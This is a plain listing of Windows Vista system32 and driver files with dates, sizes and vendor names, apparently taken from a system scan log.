2008-01-20 20:24 - 2008-01-20 20:24 - 000014848 _____ (Microsoft Corporation) C:\Windows\system32\hnetmon.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000014336 _____ (Microsoft Corporation) C:\Windows\system32\tsddd.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000014336 _____ (Microsoft Corporation) C:\Windows\system32\cmstplua.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000013824 _____ (Microsoft Corporation) C:\Windows\system32\localui.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000013824 _____ (Microsoft Corporation) C:\Windows\system32\icsunattend.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000013824 _____ (Microsoft Corporation) C:\Windows\system32\apilogen.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\mountvol.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\fdPHost.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000013312 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxapi.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000013312 _____ (Microsoft Corporation) C:\Windows\fveupdate.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000012800 _____ (Microsoft Corporation) C:\Windows\system32\batt.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000012800 _____ (Microsoft Corporation) C:\Windows\system32\avrt.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000012288 _____ (Microsoft Corporation) C:\Windows\system32\ktmw32.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000012198 _____ C:\Windows\system32\gatherWiredInfo.vbs
2008-01-20 20:24 - 2008-01-20 20:24 - 000011776 _____ (Microsoft Corporation) C:\Windows\system32\tbs.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000011776 _____ (Microsoft Corporation) C:\Windows\system32\InfDefaultInstall.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000011776 _____ (Microsoft Corporation) C:\Windows\system32\framebuf.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000011776 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rasacd.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000011264 _____ (Microsoft Corporation) C:\Windows\system32\usbperf.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000010752 _____ (Microsoft Corporation) C:\Windows\system32\vga.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000010752 _____ (Microsoft Corporation) C:\Windows\system32\txfw32.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000010752 _____ (Microsoft Corporation) C:\Windows\system32\pnpts.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000010752 _____ (Microsoft Corporation) C:\Windows\system32\KBDJPN.DLL
2008-01-20 20:24 - 2008-01-20 20:24 - 000010240 _____ (Microsoft Corporation) C:\Windows\system32\KBDKOR.DLL
2008-01-20 20:24 - 2008-01-20 20:24 - 000009216 _____ (Microsoft Corporation) C:\Windows\system32\WSHTCPIP.DLL
2008-01-20 20:24 - 2008-01-20 20:24 - 000009216 _____ (Microsoft Corporation) C:\Windows\system32\wship6.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000009216 _____ (Microsoft Corporation) C:\Windows\system32\LogonUI.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000008704 _____ (Microsoft Corporation) C:\Windows\system32\rdpcfgex.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000008704 _____ (Microsoft Corporation) C:\Windows\system32\msidle.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000008192 _____ (Microsoft Corporation) C:\Windows\system32\riched32.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000008192 _____ (Microsoft Corporation) C:\Windows\system32\nsi.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000008192 _____ (Microsoft Corporation) C:\Windows\system32\iprtprio.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000008192 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rootmdm.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000008192 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mskssrv.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000007680 _____ (Microsoft Corporation) C:\Windows\system32\spwizres.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000006656 _____ (Microsoft Corporation) C:\Windows\system32\CertEnrollCtrl.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000006144 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\RDPENCDD.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000006144 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\RDPCDD.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000006144 _____ (Microsoft Corporation) C:\Windows\system32\csrss.exe
2008-01-20 20:24 - 2008-01-20 20:24 - 000006016 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mstee.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000005888 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mspclock.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000005504 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mspqm.sys
2008-01-20 20:24 - 2008-01-20 20:24 - 000002048 _____ (Microsoft Corporation) C:\Windows\system32\wertargets.wtl
2008-01-20 20:24 - 2008-01-20 20:24 - 000002048 _____ (Microsoft Corporation) C:\Windows\system32\dmdskres2.dll
2008-01-20 20:24 - 2008-01-20 20:24 - 000001820 _____ C:\Windows\system32\rasctrnm.h
2008-01-20 20:23 - 2013-10-29 20:13 - 001304064 _____ (Microsoft Corporation) C:\Windows\system32\WMALFXGFXDSP.dll
2008-01-20 20:23 - 2011-05-05 10:01 - 000015872 _____ (Microsoft Corporation) C:\Windows\system32\hcrstco.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 009847296 _____ (Microsoft Corporation) C:\Windows\system32\NlsData000a.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 008139264 _____ (Microsoft Corporation) C:\Windows\system32\ssBranded.scr
2008-01-20 20:23 - 2008-01-20 20:23 - 004875776 _____ (Microsoft Corporation) C:\Windows\system32\NlsData0009.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 004497408 _____ (Microsoft Corporation) C:\Windows\system32\NlsData0019.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 004495360 _____ (Microsoft Corporation) C:\Windows\system32\NlsData0816.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 004495360 _____ (Microsoft Corporation) C:\Windows\system32\NlsData0416.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 004495360 _____ (Microsoft Corporation) C:\Windows\system32\NlsData0414.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 004495360 _____ (Microsoft Corporation) C:\Windows\system32\NlsData001d.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 004495360 _____ (Microsoft Corporation) C:\Windows\system32\NlsData0010.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 003466752 _____ (Microsoft Corporation) C:\Windows\system32\NlsData0013.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 003104768 _____ (Microsoft Corporation) C:\Windows\system32\NlsData004e.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 003104768 _____ (Microsoft Corporation) C:\Windows\system32\NlsData004c.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 003104768 _____ (Microsoft Corporation) C:\Windows\system32\NlsData004b.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 003104768 _____ (Microsoft Corporation) C:\Windows\system32\NlsData004a.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 002657280 _____ (Microsoft Corporation) C:\Windows\system32\NlsData0011.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 002643456 _____ (Microsoft Corporation) C:\Windows\system32\NlsData000c.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 002599936 _____ (Microsoft Corporation) C:\Windows\system32\NlsData0001.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 002588160 _____ (Microsoft Corporation) C:\Windows\system32\UIHub.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 002342912 _____ (Microsoft Corporation) C:\Windows\system32\NlsData000d.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 002243072 _____ (Microsoft Corporation) C:\Windows\system32\NlsData0007.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 002225664 _____ (Intel Corporation) C:\Windows\system32\Drivers\NETw3v32.sys
2008-01-20 20:23 - 2008-01-20 20:23 - 001965056 _____ (Microsoft Corporation) C:\Windows\system32\NlsData0c1a.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 001965056 _____ (Microsoft Corporation) C:\Windows\system32\NlsData081a.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 001965056 _____ (Microsoft Corporation) C:\Windows\system32\NlsData001b.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 001965056 _____ (Microsoft Corporation) C:\Windows\system32\NlsData001a.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 001965056 _____ (Microsoft Corporation) C:\Windows\system32\NlsData0018.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 001965056 _____ (Microsoft Corporation) C:\Windows\system32\NlsData000f.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 001965056 _____ (Microsoft Corporation) C:\Windows\system32\NlsData0003.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 001965056 _____ (Microsoft Corporation) C:\Windows\system32\NlsData0002.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 001801216 _____ (Microsoft Corporation) C:\Windows\system32\NlsData003e.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 001801216 _____ (Microsoft Corporation) C:\Windows\system32\NlsData002a.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 001675264 _____ (Microsoft Corporation) C:\Windows\system32\xpssvcs.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 001523712 _____ (Microsoft Corporation) C:\Windows\system32\NlsData0000.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 001370624 _____ (Microsoft Corporation) C:\Windows\system32\Aurora.scr
2008-01-20 20:23 - 2008-01-20 20:23 - 001298432 _____ (Microsoft Corporation) C:\Windows\system32\TMM.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000987648 _____ (Conexant Systems, Inc.) C:\Windows\system32\Drivers\VSTDPV3.SYS
2008-01-20 20:23 - 2008-01-20 20:23 - 000913408 _____ (Microsoft Corporation) C:\Windows\system32\WlanMM.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000879616 _____ (Microsoft Corporation) C:\Windows\system32\Bubbles.scr
2008-01-20 20:23 - 2008-01-20 20:23 - 000805888 _____ (Microsoft Corporation) C:\Windows\system32\cdosys.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000798208 _____ (Microsoft Corporation) C:\Windows\system32\dbghelp.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000730624 _____ (Microsoft Corporation) C:\Windows\system32\sdengin2.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000691200 _____ (Microsoft Corporation) C:\Windows\system32\TabletPC.cpl
2008-01-20 20:23 - 2008-01-20 20:23 - 000669696 _____ (Microsoft Corporation) C:\Windows\system32\netprof.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000654336 _____ (Conexant Systems, Inc.) C:\Windows\system32\Drivers\VSTCNXT3.SYS
2008-01-20 20:23 - 2008-01-20 20:23 - 000628224 _____ (Microsoft Corporation) C:\Windows\system32\WLanConn.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000531456 _____ (Microsoft Corporation) C:\Windows\system32\objsel.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000506880 _____ (Microsoft Corporation) C:\Windows\system32\MSMPEG2ENC.DLL
2008-01-20 20:23 - 2008-01-20 20:23 - 000498688 _____ (Microsoft Corporation) C:\Windows\system32\wlandlg.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000475648 _____ (Microsoft Corporation) C:\Windows\system32\msidcrl30.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000443904 _____ (Microsoft Corporation) C:\Windows\system32\wiashext.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000442368 _____ (Microsoft Corporation) C:\Windows\system32\joy.cpl
2008-01-20 20:23 - 2008-01-20 20:23 - 000442368 _____ (Microsoft Corporation) C:\Windows\system32\filemgmt.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000415744 _____ (Microsoft Corporation) C:\Windows\system32\wiadefui.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000396288 _____ (Microsoft Corporation) C:\Windows\system32\shrpubw.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000391680 _____ (Microsoft Corporation) C:\Windows\system32\MSMPEG2ADEC.DLL
2008-01-20 20:23 - 2008-01-20 20:23 - 000386560 _____ (Microsoft Corporation) C:\Windows\system32\netcfgx.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000383488 _____ (Microsoft Corporation) C:\Windows\system32\WinSATAPI.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000368640 _____ (Microsoft Corporation) C:\Windows\system32\desk.cpl
2008-01-20 20:23 - 2008-01-20 20:23 - 000357888 _____ (Microsoft Corporation) C:\Windows\system32\wbemcomn.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000337408 _____ (Microsoft Corporation) C:\Windows\system32\intl.cpl
2008-01-20 20:23 - 2008-01-20 20:23 - 000318976 _____ (Microsoft Corporation) C:\Windows\system32\cmd.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000294912 _____ (Microsoft Corporation) C:\Windows\system32\ssText3d.scr
2008-01-20 20:23 - 2008-01-20 20:23 - 000281600 _____ (Microsoft Corporation) C:\Windows\system32\qdv.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000267264 _____ (Microsoft Corporation) C:\Windows\system32\NAPSTAT.EXE
2008-01-20 20:23 - 2008-01-20 20:23 - 000243712 _____ (Microsoft Corporation) C:\Windows\system32\qwave.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000240128 _____ (Microsoft Corporation) C:\Windows\system32\uxtheme.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000229888 _____ (Microsoft Corporation) C:\Windows\system32\lsm.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000221184 _____ (Microsoft Corporation) C:\Windows\system32\Mystify.scr
2008-01-20 20:23 - 2008-01-20 20:23 - 000220672 _____ (Microsoft Corporation) C:\Windows\system32\Ribbons.scr
2008-01-20 20:23 - 2008-01-20 20:23 - 000219648 _____ (Microsoft Corporation) C:\Windows\system32\apircl.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000218112 _____ (Microsoft Corporation) C:\Windows\system32\WindowsAnytimeUpgrade.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000212992 _____ (Microsoft Corporation) C:\Windows\system32\msdt.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000205312 _____ (Microsoft Corporation) C:\Windows\system32\mdminst.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000204800 _____ (Microsoft Corporation) C:\Windows\system32\framedynos.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000202240 _____ (Microsoft Corporation) C:\Windows\system32\framedyn.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000200704 _____ (Conexant Systems, Inc.) C:\Windows\system32\Drivers\VSTAZL3.SYS
2008-01-20 20:23 - 2008-01-20 20:23 - 000198656 _____ (Microsoft Corporation) C:\Windows\system32\apss.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000193024 _____ (Microsoft Corporation) C:\Windows\system32\recdisc.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000192000 _____ (Microsoft Corporation) C:\Windows\system32\wsqmcons.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000192000 _____ (Microsoft Corporation) C:\Windows\system32\qcap.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000192000 _____ (Microsoft Corporation) C:\Windows\system32\bitsadmin.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000178688 _____ (Microsoft Corporation) C:\Windows\system32\dmime.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000175616 _____ (Microsoft Corporation) C:\Windows\system32\syncui.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000169984 _____ (Microsoft Corporation) C:\Windows\system32\WSTPager.ax
2008-01-20 20:23 - 2008-01-20 20:23 - 000169472 _____ (Microsoft Corporation) C:\Windows\system32\mssha.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000164864 _____ (Microsoft Corporation) C:\Windows\system32\VBICodec.ax
2008-01-20 20:23 - 2008-01-20 20:23 - 000162304 _____ (Microsoft Corporation) C:\Windows\system32\msdt.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000160256 _____ (Microsoft Corporation) C:\Windows\system32\MSAC3ENC.DLL
2008-01-20 20:23 - 2008-01-20 20:23 - 000159232 _____ (Microsoft Corporation) C:\Windows\system32\dinput8.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000157696 _____ (Microsoft Corporation) C:\Windows\system32\keymgr.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000146944 _____ (Microsoft Corporation) C:\Windows\system32\RstrtMgr.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000144909 _____ C:\Windows\system32\fsmgmt.msc
2008-01-20 20:23 - 2008-01-20 20:23 - 000142904 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\scsiport.sys
2008-01-20 20:23 - 2008-01-20 20:23 - 000142336 _____ (Microsoft Corporation) C:\Windows\system32\icsfiltr.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000141824 _____ (Microsoft Corporation) C:\Windows\system32\itss.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000141611 _____ C:\Windows\system32\Drivers\VSTProf.cty
2008-01-20 20:23 - 2008-01-20 20:23 - 000141572 _____ C:\Windows\system32\Drivers\VSTSProf.cty
2008-01-20 20:23 - 2008-01-20 20:23 - 000134016 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\usbvideo.sys
2008-01-20 20:23 - 2008-01-20 20:23 - 000133972 _____ C:\Windows\system32\Drivers\VSTDProf.cty
2008-01-20 20:23 - 2008-01-20 20:23 - 000133528 _____ C:\Windows\system32\Drivers\VSTEProf.cty
2008-01-20 20:23 - 2008-01-20 20:23 - 000131584 _____ (Microsoft Corporation) C:\Windows\system32\dmvdsitf.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000129536 _____ (Microsoft Corporation) C:\Windows\system32\sqmapi.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000127488 _____ (Microsoft Corporation) C:\Windows\system32\SoundRecorder.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000126976 _____ (Microsoft Corporation) C:\Windows\system32\msdart.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000120832 _____ (Microsoft Corporation) C:\Windows\system32\WLanHC.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000118784 _____ (Intel Corporation) C:\Windows\system32\Drivers\E1G60I32.sys
2008-01-20 20:23 - 2008-01-20 20:23 - 000112640 _____ (Microsoft Corporation) C:\Windows\system32\wiadss.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000111616 _____ (Microsoft Corporation) C:\Windows\system32\iscsiexe.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000110592 _____ (Microsoft Corporation) C:\Windows\system32\setupcln.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000110080 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\videoprt.sys
2008-01-20 20:23 - 2008-01-20 20:23 - 000104960 _____ (Microsoft Corporation) C:\Windows\system32\sdrsvc.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000098816 _____ (Microsoft Corporation) C:\Windows\system32\sdshext.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000097280 _____ (Microsoft Corporation) C:\Windows\system32\OptionalFeatures.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000096768 _____ (Microsoft Corporation) C:\Windows\system32\wininit.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000096768 _____ (Microsoft Corp.) C:\Windows\system32\dfrgfat.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000096312 _____ (LSI Logic) C:\Windows\system32\Drivers\lsi_scsi.sys
2008-01-20 20:23 - 2008-01-20 20:23 - 000095744 _____ (Microsoft Corporation) C:\Windows\system32\xwtpw32.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000095744 _____ (Microsoft Corporation) C:\Windows\system32\mobsync.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000095232 _____ (Microsoft Corporation) C:\Windows\system32\migisol.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000094776 _____ (Microsoft Corporation) C:\Windows\system32\MigAutoPlay.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000094208 _____ (Microsoft Corporation) C:\Windows\system32\Tabbtn.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000092160 _____ (Microsoft Corporation) C:\Windows\system32\wlancfg.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000091648 _____ (Microsoft Corporation) C:\Windows\system32\btpanui.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000089088 _____ (Microsoft Corporation) C:\Windows\system32\txflog.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000088064 _____ (Microsoft Corporation) C:\Windows\system32\wiascanprofiles.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000088064 _____ (Microsoft Corporation) C:\Windows\system32\wiaacmgr.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000084480 _____ (Microsoft Corporation) C:\Windows\system32\dmscript.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000081920 _____ (Microsoft Corporation) C:\Windows\system32\shacct.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000081408 _____ (Microsoft Corporation) C:\Windows\system32\bootcfg.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000081408 _____ (Microsoft Corporation) C:\Windows\system32\ACW.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000080384 _____ (Microsoft Corporation) C:\Windows\system32\thumbcache.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000074240 _____ (Microsoft Corporation) C:\Windows\system32\wlanext.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000070144 _____ (Microsoft Corporation) C:\Windows\system32\wzcdlg.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000070144 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\cdfs.sys
2008-01-20 20:23 - 2008-01-20 20:23 - 000069632 _____ (Microsoft Corporation) C:\Windows\system32\loghours.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000069120 _____ (Microsoft Corporation) C:\Windows\system32\kstvtune.ax
2008-01-20 20:23 - 2008-01-20 20:23 - 000068608 _____ (Microsoft Corporation) C:\Windows\system32\shgina.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000068608 _____ (Microsoft Corporation) C:\Windows\system32\DFDWiz.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000067072 _____ (Microsoft Corporation) C:\Windows\system32\HelpPaneProxy.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000064000 _____ (Microsoft Corporation) C:\Windows\system32\iscsiwmi.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000062976 _____ (Microsoft Corporation) C:\Windows\system32\wercplsupport.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000061952 _____ (Microsoft Corporation) C:\Windows\system32\tabcal.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000058880 _____ (Microsoft Corporation) C:\Windows\system32\dfrgifc.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000057856 _____ (Microsoft Corporation) C:\Windows\system32\nlsbres.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000056832 _____ (Microsoft Corporation) C:\Windows\system32\vfwwdm32.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000056320 _____ (Microsoft Corporation) C:\Windows\system32\wermgr.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000054784 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\i8042prt.sys
2008-01-20 20:23 - 2008-01-20 20:23 - 000053248 _____ (Microsoft Corporation) C:\Windows\system32\extrac32.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000052792 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\volmgr.sys
2008-01-20 20:23 - 2008-01-20 20:23 - 000052736 _____ (Microsoft Corporation) C:\Windows\system32\brcplsdw.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000052224 _____ (Microsoft Corporation) C:\Windows\system32\TabbtnEx.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000051712 _____ (Microsoft Corporation) C:\Windows\system32\umb.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000051712 _____ (Microsoft Corporation) C:\Windows\system32\takeown.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000046592 _____ (Microsoft Corporation) C:\Windows\system32\WavDest.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000043520 _____ (Microsoft Corporation) C:\Windows\system32\ksxbar.ax
2008-01-20 20:23 - 2008-01-20 20:23 - 000042496 _____ (Microsoft Corporation) C:\Windows\system32\dmocx.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000041984 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\monitor.sys
2008-01-20 20:23 - 2008-01-20 20:23 - 000041472 _____ (Microsoft) C:\Windows\system32\WlanMmHC.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000041472 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\intelppm.sys
2008-01-20 20:23 - 2008-01-20 20:23 - 000039936 _____ (Microsoft Corporation) C:\Windows\system32\dfdts.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000038400 _____ (Microsoft Corporation) C:\Windows\system32\dmloader.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000037888 _____ (Microsoft Corporation) C:\Windows\system32\pcasvc.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000035384 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\kbdclass.sys
2008-01-20 20:23 - 2008-01-20 20:23 - 000035328 _____ (Microsoft Corporation) C:\Windows\system32\dimsjob.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000034816 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\umbus.sys
2008-01-20 20:23 - 2008-01-20 20:23 - 000034360 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mouclass.sys
2008-01-20 20:23 - 2008-01-20 20:23 - 000032768 _____ (Microsoft Corporation) C:\Windows\system32\wiarpc.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000032768 _____ (Microsoft Corporation) C:\Windows\system32\dispex.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000031288 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mssmbios.sys
2008-01-20 20:23 - 2008-01-20 20:23 - 000031232 _____ (Microsoft Corporation) C:\Windows\system32\vbisurf.ax
2008-01-20 20:23 - 2008-01-20 20:23 - 000031232 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\qwavedrv.sys
2008-01-20 20:23 - 2008-01-20 20:23 - 000030208 _____ (Microsoft Corporation) C:\Windows\system32\werdiagcontroller.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000030208 _____ (Microsoft Corporation) C:\Windows\system32\rdrleakdiag.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000028160 _____ (Microsoft Corporation) C:\Windows\system32\sxproxy.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000028160 _____ (Microsoft Corporation) C:\Windows\system32\iscsium.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000028160 _____ (Microsoft Corporation) C:\Windows\system32\AtBroker.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000027648 _____ (Microsoft Corporation) C:\Windows\system32\syskey.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000026624 _____ (Microsoft Corporation) C:\Windows\system32\pcadm.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000026624 _____ (Microsoft Corporation) C:\Windows\system32\cofiredm.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000026112 _____ (Microsoft Corporation) C:\Windows\system32\vss_ps.dll
2008-01-20 20:23 - 2008-01-20 20:23 - 000026112 _____ (Microsoft Corporation) C:\Windows\system32\prevhost.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000026112 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\vgapnp.sys
2008-01-20 20:23 - 2008-01-20 20:23 - 000025600 _____ (Microsoft Corporation) C:\Windows\system32\Netplwiz.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000025600 _____ (Microsoft Corporation) C:\Windows\system32\cacls.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000025088 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fdc.sys
2008-01-20 20:23 - 2008-01-20 20:23 - 000022528 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\msfs.sys
2008-01-20 20:23 - 2008-01-20 20:23 - 000021504 _____ (Microsoft Corporation) C:\Windows\system32\svchost.exe
2008-01-20 20:23 - 2008-01-20 20:23 - 000020480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\flpydisk.sys
2008-01-20 20:23 - 2008-01-20 20:23 - 000019968 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\sermouse.sys
